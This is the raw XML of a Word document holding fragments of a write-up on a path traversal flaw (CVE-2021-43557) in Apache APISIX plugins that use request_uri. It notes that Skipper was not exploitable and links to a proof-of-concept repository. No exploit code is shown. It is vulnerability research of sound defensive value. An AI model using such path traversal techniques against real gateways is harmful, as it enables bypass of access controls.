          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>😐</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve"> I see in code that developers are not using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Emphasis"/>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>easily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RequestURI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or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originalRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5074E6EC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I wasn’t able to exploit path traversal in this case. Skipper remains safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBD981" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6407AD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Apache APISIX is vulnerable for path traversal. It’s not affecting any external authentication, but plugins that are using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Style w:val="HTMLCode"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADD8E6"/>
        </w:rPr>
        <w:t>ctx.var.request_uri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r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A873B36" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Whole code of this example is here</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Fira Sans" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00F4244D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>https://github.com/xvnpw/k8s-CVE-2021-43557-poc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0963F" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00250022" w:rsidRPr="00F42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37E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="689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32BE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="09A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22"/>
    <w:rsid w:val="00250022"/>
    <w:rsid w:val="00F4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07C23"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35D52ACD-D97D-474E-A3BD-8FF61F98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0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0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2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500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0022"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002500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00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00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0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6913">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="0000FF"/>
            <w:left w:val="none" w:sz="0" w:space="12" w:color="0000FF"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="0000FF"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="0000FF"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="486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apisix-ingress-controller/blob/master/docs/en/latest/deployments/minikube.md" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opensource.zalando.com/skipper/reference/fil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ginx.org/en/docs/http/ngx_http_core_module.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/apache/apisix/blob/a3d42e66f60673e408cab2e2ceedc58aee450776/apisix/plugins/authz-keycloak.l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alando/skipper" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/apache/apisix/blob/master/docs/en/latest/plugins/authz-keycloak.md" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/apache/apisix-ingress-controll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apisix/blob/11e7824cee0e4ab0145ea7189d991464ade3682a/apisix/plugins/uri-blocker.lua" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/xvnpw/k8s-CVE-2021-43557-p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mtx tianxia</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mtx tianxia</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-01T09:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-01T09:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>